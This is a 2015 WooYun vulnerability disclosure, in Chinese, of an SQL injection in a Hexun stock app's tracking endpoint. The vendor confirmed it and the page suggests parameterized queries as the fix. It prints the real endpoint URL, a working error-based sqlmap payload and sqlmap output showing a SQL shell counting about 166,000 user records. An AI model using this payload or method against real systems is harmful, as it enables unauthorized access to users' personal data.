当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141261

漏洞标题:和讯财经某app接口存在SQL注入漏洞影响数十万用户账户信息

相关厂商:和讯网

漏洞作者: 路人甲

提交时间:2015-09-15 13:30

修复时间:2015-10-30 13:48

公开时间:2015-10-30 13:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-15: 厂商已经确认,细节仅向厂商公开
2015-09-25: 细节向核心白帽子及相关领域专家公开
2015-10-05: 细节向普通白帽子公开
2015-10-15: 细节向实习白帽子公开
2015-10-30: 细节向公众公开

简要描述:

mysql显错注入,涉及大量用户信息

详细说明:

和讯股票app,注入点如下
http://mtrack.hexun.com/track/hcstock.php?task=registeruser&userid=25863150&username=mail98318187&deviceuid=355136055562691&devicetoken=03551360555626910000001034000001&status=active&pushbadge=enabled
参数username存在注入,直接报错注入,方便快捷,而且很明显这个 点涉及到了用户相关的数据库

漏洞证明:

hx.png


sqlmap
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: username (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: task=registeruser&userid=25863150&username=mail98318187' AND (SELECT 7125 FROM(SELECT COUNT(*),CONCAT(0x7162716b71,(SELECT (CASE WHEN (7125=7125) THEN 1 ELSE 0 END)),0x7162707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'NzpX'='NzpX&deviceuid=355136055562691&devicetoken=03551360555626910000001034000001&status=active&pushbadge=enabled
---
[04:34:18] [INFO] testing MySQL
[04:34:18] [INFO] confirming MySQL
[04:34:18] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[04:34:18] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select count(*) from hx_users
[04:34:33] [INFO] fetching SQL SELECT statement query output: 'select count(*) from hx_users'
[04:34:33] [INFO] heuristics detected web page charset 'ascii'
[04:34:33] [WARNING] reflective value(s) found and filtering out
[04:34:33] [INFO] retrieved: 166795
select count(*) from hx_users: '166795'
sql-shell>

修复方案:

过滤,参数化

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-09-15 13:46

厂商回复:

谢谢 处理中

最新状态:

暂无